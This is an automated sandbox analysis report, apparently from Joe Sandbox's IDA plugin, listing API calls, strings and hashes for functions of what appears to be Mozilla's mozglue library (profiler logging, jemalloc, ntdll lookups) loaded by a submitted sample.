                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                      • String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
                                                                                                      • API String ID: 2848912005-2840072211
                                                                                                      • Opcode ID: 8738a382eb2eb520d2eef01e81882235442638979f8cd9c311f6d3526c5c307d
                                                                                                      • Instruction ID: 59f23accf91a21f246cb9e4802caac83fa2dccd68832a51bf8fa9a9898b5971c
                                                                                                      • Opcode Fuzzy Hash: 8738a382eb2eb520d2eef01e81882235442638979f8cd9c311f6d3526c5c307d
                                                                                                      • Instruction Fuzzy Hash: ECF054765002149FEA006BE59C4AB6A7BBDFB8B29DF054015FA1583302DF7598058761
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • LoadLibraryW.KERNEL32(kernel32.dll,6CFA0DF8), ref: 6CFA0E82
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetProcessMitigationPolicy), ref: 6CFA0EA1
                                                                                                      • __Init_thread_footer.LIBCMT ref: 6CFA0EB5
                                                                                                      • FreeLibrary.KERNEL32 ref: 6CFA0EC5
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Library$AddressFreeInit_thread_footerLoadProc
                                                                                                      • String ID: GetProcessMitigationPolicy$kernel32.dll
                                                                                                      • API String ID: 391052410-1680159014
                                                                                                      • Opcode ID: 382b32ae8f542060ecf84cbec6e5bb8162e65a04be76e79a4f7995342012e8f6
                                                                                                      • Instruction ID: 455f23f18da9111e403b283edbebfa692c1b00d0e112d3cad8bf4c4a629932a9
                                                                                                      • Opcode Fuzzy Hash: 382b32ae8f542060ecf84cbec6e5bb8162e65a04be76e79a4f7995342012e8f6
                                                                                                      • Instruction Fuzzy Hash: 39016276600381DBEF00CFD8DD96B927BF9F747314F104225E92A82BA0D7B0E405DA02
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 6CFD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CFA4A68), ref: 6CFD945E
                                                                                                        • Part of subcall function 6CFD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CFD9470
                                                                                                        • Part of subcall function 6CFD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CFD9482
                                                                                                        • Part of subcall function 6CFD9420: __Init_thread_footer.LIBCMT ref: 6CFD949F
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFDF619
                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6CFDF598), ref: 6CFDF621
                                                                                                        • Part of subcall function 6CFD94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CFD94EE
                                                                                                        • Part of subcall function 6CFD94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CFD9508
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFDF637
                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6D01F4B8,?,?,00000000,?,6CFDF598), ref: 6CFDF645
                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6D01F4B8,?,?,00000000,?,6CFDF598), ref: 6CFDF663
                                                                                                      Strings
                                                                                                      • [D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6CFDF62A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                      • String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
                                                                                                      • API String ID: 2848912005-753366533
                                                                                                      • Opcode ID: 8bb261cc37a008364216d5c57a6f2f66f6d4e4c5b5bbc81048809da7bb045103
                                                                                                      • Instruction ID: c0f55ca1c045f22d7dc2ca884d0109fec25c3e1cefb68020b8dbddefa16b3a9e
                                                                                                      • Opcode Fuzzy Hash: 8bb261cc37a008364216d5c57a6f2f66f6d4e4c5b5bbc81048809da7bb045103
                                                                                                      • Instruction Fuzzy Hash: DCF05476100214AFEA006BE59C49B6A7BBDFB8B29DF054015FA1583742DF7558058761
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(<jemalloc>,?,?,?,?,6CFCCFAE,?,?,?,6CF931A7), ref: 6CFD05FB
                                                                                                      • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,<jemalloc>,00000000,6CFCCFAE,?,?,?,6CF931A7), ref: 6CFD0616
                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(: (malloc) Error in VirtualFree(),?,?,?,?,?,?,?,6CF931A7), ref: 6CFD061C
                                                                                                      • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,: (malloc) Error in VirtualFree(),00000000,?,?,?,?,?,?,?,?,6CF931A7), ref: 6CFD0627
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _writestrlen
                                                                                                      • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                      • API String ID: 2723441310-2186867486
                                                                                                      • Opcode ID: caae92e14d69ea61b816726f524f9a8fc6fcbbc4604b40e0b4076793bd4d8b5e
                                                                                                      • Instruction ID: 8563cfb35f07223aaa69586e4858cf3c7d6931e133d8f19ef5a541c15ada1384
                                                                                                      • Opcode Fuzzy Hash: caae92e14d69ea61b816726f524f9a8fc6fcbbc4604b40e0b4076793bd4d8b5e
                                                                                                      • Instruction Fuzzy Hash: B4E08CE291505037F5146256AC86EBB761CCBC6134F090039FE0D83301EA4AAE1A51FA
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a6c51d028c2d9455143156a8f3dd1cbe592b44ec7834a7ed40eff4f77dcc4813
                                                                                                      • Instruction ID: c09caba89ecfceaf3df9f6e7e491747494f473404f1d8eb7ccadfc828b6bbeab
                                                                                                      • Opcode Fuzzy Hash: a6c51d028c2d9455143156a8f3dd1cbe592b44ec7834a7ed40eff4f77dcc4813
                                                                                                      • Instruction Fuzzy Hash: B6A147B1A00645CFDB14CF69D984B9AFBF1BF49304F44866ED45A97B00E770AA46CF90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFF14C5
                                                                                                      • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CFF14E2
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFF1546
                                                                                                      • InitializeConditionVariable.KERNEL32(?), ref: 6CFF15BA
                                                                                                      • free.MOZGLUE(?), ref: 6CFF16B4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
                                                                                                      • String ID:
                                                                                                      • API String ID: 1909280232-0
                                                                                                      • Opcode ID: 17ced20d702d5a73165650bba4d7f4ae65e5875916215198ff2b0ccdf5021d58
                                                                                                      • Instruction ID: c043257ff8f105db7d8b97f5e88170c5869fd5e986a716b6a8611575e322fdd2
                                                                                                      • Opcode Fuzzy Hash: 17ced20d702d5a73165650bba4d7f4ae65e5875916215198ff2b0ccdf5021d58
                                                                                                      • Instruction Fuzzy Hash: F561EE729007149BDB128F21C880BDEBBB5FF89308F04851CED9A57711EB35E989CB92
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFEDC60
                                                                                                      • AcquireSRWLockExclusive.KERNEL32(?,?,?,6CFED38A,?), ref: 6CFEDC6F
                                                                                                      • free.MOZGLUE(?,?,?,?,?,6CFED38A,?), ref: 6CFEDCC1
                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6CFED38A,?), ref: 6CFEDCE9
                                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6CFED38A,?), ref: 6CFEDD05
                                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6CFED38A,?), ref: 6CFEDD4A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
                                                                                                      • String ID:
                                                                                                      • API String ID: 1842996449-0
                                                                                                      • Opcode ID: d08e266f2ada4ec8ec866e8175898da418e99fe2bed72667dc44aff8a4be8536
                                                                                                      • Instruction ID: 01cd6c5a378901255c2fb254ee546adb86f4ab398f016f220e5689f977ef4936
                                                                                                      • Opcode Fuzzy Hash: d08e266f2ada4ec8ec866e8175898da418e99fe2bed72667dc44aff8a4be8536
                                                                                                      • Instruction Fuzzy Hash: F7418DB5A00215DFCB00CFA9C880A9AB7F6FF8D314B554569D945ABB11E771FC00CB91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 6CFCFA80: GetCurrentThreadId.KERNEL32 ref: 6CFCFA8D
                                                                                                        • Part of subcall function 6CFCFA80: AcquireSRWLockExclusive.KERNEL32(6D01F448), ref: 6CFCFA99
                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CFD6727
                                                                                                      • ?GetOrAddIndex@UniqueJSONStrings@baseprofiler@mozilla@@AAEIABV?$Span@$$CBD$0PPPPPPPP@@3@@Z.MOZGLUE(?,?,?,?,?,?,?,00000001), ref: 6CFD67C8
                                                                                                        • Part of subcall function 6CFE4290: memcpy.VCRUNTIME140(?,?,6CFF2003,6CFF0AD9,?,6CFF0AD9,00000000,?,6CFF0AD9,?,00000004,?,6CFF1A62,?,6CFF2003,?), ref: 6CFE42C4
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExclusiveLock$AcquireCurrentIndex@P@@3@@ReleaseSpan@$$Strings@baseprofiler@mozilla@@ThreadUniquememcpy
                                                                                                      • String ID: data
                                                                                                      • API String ID: 511789754-2918445923
                                                                                                      • Opcode ID: bca62c479a44c3c43309fe57b67cab0c39fd47969246fdeca7bf7e67d3e8d7e0
                                                                                                      • Instruction ID: 3c2239f5066c1d8346d01b66818afa8362655bd16dd7735bf18a51ed56bfb89f
                                                                                                      • Opcode Fuzzy Hash: bca62c479a44c3c43309fe57b67cab0c39fd47969246fdeca7bf7e67d3e8d7e0
                                                                                                      • Instruction Fuzzy Hash: 98D1BC75A083409FE724CF64C840B9FBBE5AFD5308F15492DE589C7B91EB30A949CB62
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • moz_xmalloc.MOZGLUE(00000001,?,?,?,?,6CF9EB57,?,?,?,?,?,?,?,?,?), ref: 6CFCD652
                                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6CF9EB57,?), ref: 6CFCD660
                                                                                                      • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6CF9EB57,?), ref: 6CFCD673
                                                                                                      • free.MOZGLUE(?), ref: 6CFCD888
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: free$memsetmoz_xmalloc
                                                                                                      • String ID: |Enabled
                                                                                                      • API String ID: 4142949111-2633303760
                                                                                                      • Opcode ID: a82e0c0204e8a95a9d584b9abc9b5e3c0915bc91ccf44d9aba1f720e1d2f4e94
                                                                                                      • Instruction ID: 38319c33da2bba1cb3b0495d587cce95485c2885dc5d94dcd9d7d38c1f4e48ae
                                                                                                      • Opcode Fuzzy Hash: a82e0c0204e8a95a9d584b9abc9b5e3c0915bc91ccf44d9aba1f720e1d2f4e94
                                                                                                      • Instruction Fuzzy Hash: 6DA1D170B042069FDB15CF69C8D07AFBBF1AF49318F14805CD899AB781D735A845CBA2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6CFCF480
                                                                                                        • Part of subcall function 6CF9F100: LoadLibraryW.KERNEL32(shell32,?,6D00D020), ref: 6CF9F122
                                                                                                        • Part of subcall function 6CF9F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6CF9F132
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 6CFCF555
                                                                                                        • Part of subcall function 6CFA14B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6CFA1248,6CFA1248,?), ref: 6CFA14C9
                                                                                                        • Part of subcall function 6CFA14B0: memcpy.VCRUNTIME140(?,6CFA1248,00000000,?,6CFA1248,?), ref: 6CFA14EF
                                                                                                        • Part of subcall function 6CF9EEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6CF9EEE3
                                                                                                      • CreateFileW.KERNEL32 ref: 6CFCF4FD
                                                                                                      • GetFileInformationByHandle.KERNEL32(00000000), ref: 6CFCF523
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
                                                                                                      • String ID: \oleacc.dll
                                                                                                      • API String ID: 2595878907-3839883404
                                                                                                      • Opcode ID: 9f4e6bf4c9c3c43ce0256f7d8f1bf8da152bf00e25c0c9b8026a7e9525eb7f86
                                                                                                      • Instruction ID: 5b0dd44481bc964c2edda9f6627ccf5985ae4439f0957d3424bda5599107dd70
                                                                                                      • Opcode Fuzzy Hash: 9f4e6bf4c9c3c43ce0256f7d8f1bf8da152bf00e25c0c9b8026a7e9525eb7f86
                                                                                                      • Instruction Fuzzy Hash: 4B418B707087119FE760DF68C884B9BF7F4AF85318F104A18F6A483650EB30DA498B92
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • SetLastError.KERNEL32(00000000), ref: 6CFF7526
                                                                                                      • __Init_thread_footer.LIBCMT ref: 6CFF7566
                                                                                                      • __Init_thread_footer.LIBCMT ref: 6CFF7597
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Init_thread_footer$ErrorLast
                                                                                                      • String ID: UnmapViewOfFile2$kernel32.dll
                                                                                                      • API String ID: 3217676052-1401603581
                                                                                                      • Opcode ID: f943982c075a6c13edacbff1f68ba3d5c033880a7fc91850d7efc57d5f77fa2a
                                                                                                      • Instruction ID: 54d41f5f2cf6d2d15d966c945c4829c2e8744ed5d1fb87bf2e6451a1d850635e
                                                                                                      • Opcode Fuzzy Hash: f943982c075a6c13edacbff1f68ba3d5c033880a7fc91850d7efc57d5f77fa2a
                                                                                                      • Instruction Fuzzy Hash: 9221F536705501E7DB15CFE9CC55F5A77BAEB86324F14022EE42997B90C720F8038656
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • LoadLibraryW.KERNEL32(ntdll.dll,?,6CFFC0E9), ref: 6CFFC418
                                                                                                      • GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6CFFC437
                                                                                                      • FreeLibrary.KERNEL32(?,6CFFC0E9), ref: 6CFFC44C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                      • String ID: NtQueryVirtualMemory$ntdll.dll
                                                                                                      • API String ID: 145871493-2623246514
                                                                                                      • Opcode ID: 42da9faf904e16de7c103d49ea92c9bb259dd1abd9e2be4e2b1c001f77f8cbda
                                                                                                      • Instruction ID: bfdef7a940bc685f0169541e5e0025e03f174c31ba6188af9dce9a957365e1c0
                                                                                                      • Opcode Fuzzy Hash: 42da9faf904e16de7c103d49ea92c9bb259dd1abd9e2be4e2b1c001f77f8cbda
                                                                                                      • Instruction Fuzzy Hash: F4E09276445301ABEB00BBF58D0A7117FFCF70B608F20421AAA2892361EBB0C0128A51
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • LoadLibraryW.KERNEL32(ntdll.dll,?,6CFF748B,?), ref: 6CFF75B8
                                                                                                      • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 6CFF75D7
                                                                                                      • FreeLibrary.KERNEL32(?,6CFF748B,?), ref: 6CFF75EC
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                      • String ID: RtlNtStatusToDosError$ntdll.dll
                                                                                                      • API String ID: 145871493-3641475894
                                                                                                      • Opcode ID: 18a82e2085e5b25e288720a55ecb06fb24e8319e9a8a3e6f7d9d222881f0d1a8
                                                                                                      • Instruction ID: aef2b6d9d949d7a75b0cf2864938da1b428ab0c6924c38f112c21ebd60b1a62c
                                                                                                      • Opcode Fuzzy Hash: 18a82e2085e5b25e288720a55ecb06fb24e8319e9a8a3e6f7d9d222881f0d1a8
                                                                                                      • Instruction Fuzzy Hash: 58E092B2404301ABEB01ABE2DC4A7117EFCFB07218F104126A924D2361EBB4C0529F11
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • LoadLibraryW.KERNEL32(ntdll.dll,?,6CFF7592), ref: 6CFF7608
                                                                                                      • GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 6CFF7627
                                                                                                      • FreeLibrary.KERNEL32(?,6CFF7592), ref: 6CFF763C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                      • String ID: NtUnmapViewOfSection$ntdll.dll
                                                                                                      • API String ID: 145871493-1050664331
                                                                                                      • Opcode ID: dd4973e8c48be777e934ac8df6254b988b97da24adc6c45c9fc902a608bf62f7
                                                                                                      • Instruction ID: 8621a3b91eb19e8b47b7d0527d4195b86e6eddd0deeb4fdf0f2314c7b56ab00f
                                                                                                      • Opcode Fuzzy Hash: dd4973e8c48be777e934ac8df6254b988b97da24adc6c45c9fc902a608bf62f7
                                                                                                      • Instruction Fuzzy Hash: 7EE092B2404701ABEF016FE68C4A7157EFCF71B359F004216E929D2361E7B0C0118B15
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • memset.VCRUNTIME140(?,00000000,?,?,6CFFBE49), ref: 6CFFBEC4
                                                                                                      • RtlCaptureStackBackTrace.NTDLL ref: 6CFFBEDE
                                                                                                      • memset.VCRUNTIME140(00000000,00000000,-00000008,?,6CFFBE49), ref: 6CFFBF38
                                                                                                      • RtlReAllocateHeap.NTDLL ref: 6CFFBF83
                                                                                                      • RtlFreeHeap.NTDLL(6CFFBE49,00000000), ref: 6CFFBFA6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
